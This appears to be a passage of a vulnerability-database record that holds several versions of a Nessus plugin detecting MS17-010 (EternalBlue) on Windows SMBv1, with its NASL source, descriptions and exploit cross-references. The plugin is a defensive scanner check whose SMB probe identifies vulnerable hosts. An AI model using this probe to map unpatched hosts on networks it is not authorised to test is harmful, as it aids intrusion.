by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"smb_v1_enabled_remote.nasl\");\n script_require_keys(\"Host/OS\", \"SMB/SMBv1_is_supported\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\n\nfunction smb_get_error_code (data)\n{\n local_var header, flags2, code;\n\n # Some checks in the header first\n header = get_smb_header (smbblob:data);\n if (!header)\n return NULL;\n\n flags2 = get_header_flags2 (header:header);\n if (flags2 & SMB_FLAGS2_32BIT_STATUS)\n {\n code = get_header_nt_error_code (header:header);\n }\n else\n {\n code = get_header_dos_error_code (header:header);\n }\n\n return code;\n}\n\n\nfunction my_smb_trans_and_x (setup, transname, param, data, max_pcount, max_dcount)\n{\n local_var header, parameters, dat, packet, ret, pad1, trans, p_offset, d_offset, plen, dlen, slen, pad2, npad;\n\n npad = pad1 = pad2 = NULL;\n\n if (session_is_unicode () == 1)\n trans = cstring (string:transname);\n else\n trans = transname;\n\n header = smb_header (Command: SMB_COM_TRANSACTION,\n Status: nt_status (Status: STATUS_SUCCESS));\n\n p_offset = 32 + 1 + 28 + strlen(setup) + 2 + strlen(trans);\n\n # Unicode transname should be aligned to 2 byte \n if(session_is_unicode() == 1)\n {\n npad = crap(data:'\\x00', length: (2 - p_offset % 2) % 2);\n p_offset += strlen(npad);\n }\n\n # Parameter is aligned to 4 byte\n pad1 = crap(data:'\\x00', length: (4 - p_offset % 4) % 4);\n p_offset += strlen(pad1);\n\n # Data is aligned to 4 byte\n d_offset = p_offset + strlen (param);\n pad2 = crap(data:'\\x00', length: (4 - d_offset % 4) % 4);\n d_offset += strlen(pad2);\n\n plen = strlen(param);\n dlen = strlen(data);\n slen = strlen(setup);\n\n if(isnull(max_pcount)) max_pcount =0xffff;\n if(isnull(max_dcount)) max_dcount =0xffff;\n\n parameters = \n raw_word (w:plen) + # total 
parameter count\n\t raw_word (w:dlen) + # total data count\n\t raw_word (w:max_pcount) + # Max parameter count\n\t raw_word (w:max_dcount) + # Max data count\n\t raw_byte (b:0) + # Max setup count\n raw_byte (b:0) + # Reserved\n\t raw_word (w:0) + # Flags\n\t raw_dword (d:0) + # Timeout\n\t raw_word (w:0) + # Reserved\n\t raw_word (w:plen) + # Parameter count\n\t raw_word (w:p_offset) + # Parameter offset\n\t raw_word (w:dlen) + # Data count\n\t raw_word (w:d_offset) + # Data offset\n\t raw_byte (b:slen/2) + # Setup count\n\t raw_byte (b:0); # Reserved\n\n parameters += setup;\n\n parameters = smb_parameters (data:parameters);\n\n dat = npad +\n trans +\n pad1 +\n param +\n pad2 +\n data;\n\n dat = smb_data (data:dat);\n\n packet = netbios_packet (header:header, parameters:parameters, data:dat);\n\n ret = smb_sendrecv (data:packet);\n if (!ret)\n return NULL;\n\n return smb_get_error_code (data:ret);\n}\n\n\n#\n# MAIN\n#\n\n# Make sure it's Windows \nos = get_kb_item_or_exit(\"Host/OS\");\nif (\"Windows\" >!< os)\n audit(AUDIT_HOST_NOT, \"Windows\"); \n \n# Make sure SMBv1 is enabled\nif (! get_kb_item(\"SMB/SMBv1_is_supported\"))\n exit(0, \"SMB version 1 does not appear to be enabled on the remote host.\"); \n\nif (!smb_session_init(smb2:FALSE)) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nr = NetUseAdd(share:\"IPC$\");\nif (r != 1)\n{\n exit(1, 'Failed to connect to the IPC$ share anonymously.');\n}\n\nfid = 0; # Invalid FID \nsetup = raw_word (w:0x23) + raw_word (w:fid); \n\nstatus = my_smb_trans_and_x (setup: setup, transname:\"\\PIPE\\\");\nNetUseDel();\n\nif(! 
isnull(status))\n{\n if(status == STATUS_INVALID_HANDLE\n || status == STATUS_ACCESS_DENIED # Win 10\n )\n {\n audit(AUDIT_HOST_NOT , \"affected\"); \n }\n else if (status == STATUS_INSUFF_SERVER_RESOURCES)\n {\n port = kb_smb_transport();\n security_report_v4(port: port, severity: SECURITY_HOLE);\n }\n else\n {\n status = \"0x\" + toupper(hexstr(mkdword(status)));\n audit(AUDIT_RESP_BAD, port, \"an SMB_COM_TRANSACTION request. Status code: \" + status);\n }\n}\nelse\n{\n exit(1, \"Failed to get response status for an SMB_COM_TRANSACTION request.\"); \n}\n", "naslFamily": "Windows", "cpe": ["cpe:/o:microsoft:windows"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2018-11-17T03:13:38", "differentElements": ["cvelist", "cvss", "description", "href", "modified", "references", "reporter", "sourceData"], "edition": 2}, {"bulletin": {"id": "MS17-010.NASL", "hash": "49780494f150c8bc0aa084e3c459ba8cddaa12be6217a734a5c458ecb9db59d0", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)", "description": "The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. 
An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.", "published": "2017-03-20T00:00:00", "modified": "2019-12-02T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/nessus/97833", "reporter": "This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?8dcab5e4", "http://www.nessus.org/u?4c7e0cf3", "http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?d9f569cf", "http://www.nessus.org/u?234f8ef8", "https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?68fc8eff", "http://www.nessus.org/u?59db5b5b", "http://www.nessus.org/u?b9d9ebf9", "http://www.nessus.org/u?065561d0"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0199", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2019-12-13T08:09:43", "history": [], "viewCount": 6516, "enchantments": {"dependencies": {"modified": "2019-12-13T08:09:43", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", 
"MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0144"], "type": "mscve"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["SSV:92952", "SSV:92935", "SSV:92964"], "type": "seebug"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": 
["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["FIREEYE:ABF21A18BEF0ABDDD461684446C0A772", "FIREEYE:37C92D78C4F9986624FA2FB49CBCB764", "FIREEYE:8CFA7797EC0BA31DD1AD30C4C7EE1BED", "FIREEYE:E77EEC61CF4FE2F4BDB43A5A0C15A644"], "type": "fireeye"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MYHACK58:62201785243", "MYHACK58:62201785189", "MYHACK58:62201785331", "MYHACK58:62201785268", "MYHACK58:62201786816", "MYHACK58:62201786827"], "type": "myhack58"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0199", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"], "type": "avleonov"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2019-12-13T08:09:43", "value": 7.5, "vector": "NONE"}}, "objectVersion": "1.6", 
"pluginID": "97833", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97833);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)\");\n script_summary(english:\"Checks the presence of MS17-010.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. 
(CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?68fc8eff\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/\");\n # https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and\n script_set_attribute(attribute:\"see_also\", 
value:\"http://www.nessus.org/u?b9d9ebf9\");\n # https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8dcab5e4\");\n # https://www.theregister.co.uk/2017/01/18/uscert_warns_admins_to_kill_smb_after_shadow_brokers_dump/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?234f8ef8\");\n # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7e0cf3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft\nrecommends that users discontinue the use of SMBv1. SMBv1 lacks\nsecurity features that were included in later SMB versions. SMBv1 can\nbe disabled by following the vendor instructions provided in Microsoft\nKB2696547. Additionally, US-CERT recommends that users block SMB\ndirectly by blocking TCP port 445 on all network boundary devices. 
For\nSMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137\n/ 138 on all network boundary devices.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"smb_v1_enabled_remote.nasl\");\n script_require_keys(\"Host/OS\", \"SMB/SMBv1_is_supported\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\n\nfunction smb_get_error_code (data)\n{\n local_var header, flags2, code;\n\n # Some checks in the header first\n header = get_smb_header (smbblob:data);\n if (!header)\n return NULL;\n\n flags2 = get_header_flags2 (header:header);\n if (flags2 & SMB_FLAGS2_32BIT_STATUS)\n {\n code = get_header_nt_error_code (header:header);\n }\n else\n {\n code = get_header_dos_error_code (header:header);\n }\n\n return code;\n}\n\n\nfunction my_smb_trans_and_x (setup, transname, param, data, max_pcount, max_dcount)\n{\n local_var header, parameters, dat, packet, ret, pad1, trans, p_offset, d_offset, plen, dlen, slen, pad2, npad;\n\n npad = pad1 = pad2 = NULL;\n\n if (session_is_unicode () == 1)\n trans = cstring (string:transname);\n else\n trans = transname;\n\n header = smb_header (Command: SMB_COM_TRANSACTION,\n Status: nt_status (Status: STATUS_SUCCESS));\n\n p_offset = 32 + 1 + 28 + strlen(setup) + 2 + strlen(trans);\n\n # Unicode transname should be aligned to 2 byte \n if(session_is_unicode() == 1)\n {\n npad = crap(data:'\\x00', length: (2 - p_offset % 2) % 2);\n p_offset += strlen(npad);\n }\n\n # Parameter is aligned to 4 byte\n pad1 = crap(data:'\\x00', length: (4 - p_offset % 4) % 4);\n p_offset += strlen(pad1);\n\n # Data is aligned to 4 byte\n d_offset = p_offset + strlen (param);\n pad2 = crap(data:'\\x00', length: (4 - d_offset % 4) % 4);\n d_offset += strlen(pad2);\n\n plen = strlen(param);\n dlen = strlen(data);\n slen = strlen(setup);\n\n if(isnull(max_pcount)) max_pcount =0xffff;\n if(isnull(max_dcount)) max_dcount =0xffff;\n\n parameters = \n raw_word (w:plen) + # total parameter count\n\t 
raw_word (w:dlen) + # total data count\n\t raw_word (w:max_pcount) + # Max parameter count\n\t raw_word (w:max_dcount) + # Max data count\n\t raw_byte (b:0) + # Max setup count\n raw_byte (b:0) + # Reserved\n\t raw_word (w:0) + # Flags\n\t raw_dword (d:0) + # Timeout\n\t raw_word (w:0) + # Reserved\n\t raw_word (w:plen) + # Parameter count\n\t raw_word (w:p_offset) + # Parameter offset\n\t raw_word (w:dlen) + # Data count\n\t raw_word (w:d_offset) + # Data offset\n\t raw_byte (b:slen/2) + # Setup count\n\t raw_byte (b:0); # Reserved\n\n parameters += setup;\n\n parameters = smb_parameters (data:parameters);\n\n dat = npad +\n trans +\n pad1 +\n param +\n pad2 +\n data;\n\n dat = smb_data (data:dat);\n\n packet = netbios_packet (header:header, parameters:parameters, data:dat);\n\n ret = smb_sendrecv (data:packet);\n if (!ret)\n return NULL;\n\n return smb_get_error_code (data:ret);\n}\n\n\n#\n# MAIN\n#\n\n# Make sure it's Windows \nos = get_kb_item_or_exit(\"Host/OS\");\nif (\"Windows\" >!< os)\n audit(AUDIT_HOST_NOT, \"Windows\"); \n \n# Make sure SMBv1 is enabled\nif (! get_kb_item(\"SMB/SMBv1_is_supported\"))\n exit(0, \"SMB version 1 does not appear to be enabled on the remote host.\"); \n\nif (!smb_session_init(smb2:FALSE)) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nr = NetUseAdd(share:\"IPC$\");\nif (r != 1)\n{\n exit(1, 'Failed to connect to the IPC$ share anonymously.');\n}\n\nfid = 0; # Invalid FID \nsetup = raw_word (w:0x23) + raw_word (w:fid); \n\nstatus = my_smb_trans_and_x (setup: setup, transname:\"\\PIPE\\\");\nNetUseDel();\n\nif(! 
isnull(status))\n{\n if(status == STATUS_INVALID_HANDLE\n || status == STATUS_ACCESS_DENIED # Win 10\n )\n {\n audit(AUDIT_HOST_NOT , \"affected\"); \n }\n else if (status == STATUS_INSUFF_SERVER_RESOURCES)\n {\n port = kb_smb_transport();\n security_report_v4(port: port, severity: SECURITY_HOLE);\n }\n else\n {\n status = \"0x\" + toupper(hexstr(mkdword(status)));\n audit(AUDIT_RESP_BAD, port, \"an SMB_COM_TRANSACTION request. Status code: \" + status);\n }\n}\nelse\n{\n exit(1, \"Failed to get response status for an SMB_COM_TRANSACTION request.\"); \n}\n", "naslFamily": "Windows", "cpe": ["cpe:/o:microsoft:windows"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2019-12-13T08:09:43", "differentElements": ["cvss3", "modified"], "edition": 3}, {"bulletin": {"id": "MS17-010.NASL", "hash": "2e89364697b0c22cabb8b6af54ef1391c6c3ec60dfbd44186417c803cc34c48f", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)", "description": "The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. 
An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.", "published": "2017-03-20T00:00:00", "modified": "2020-03-02T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97833", "reporter": "This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["http://www.nessus.org/u?8dcab5e4", "http://www.nessus.org/u?4c7e0cf3", "http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?d9f569cf", "http://www.nessus.org/u?234f8ef8", "https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?68fc8eff", "http://www.nessus.org/u?59db5b5b", "http://www.nessus.org/u?b9d9ebf9", "http://www.nessus.org/u?065561d0"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0199", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2020-03-18T01:26:56", "history": [], "viewCount": 6643, "enchantments": {"dependencies": {"modified": "2020-03-18T01:26:56", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["SSV:92952", "SSV:92935", "SSV:92964"], "type": "seebug"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": 
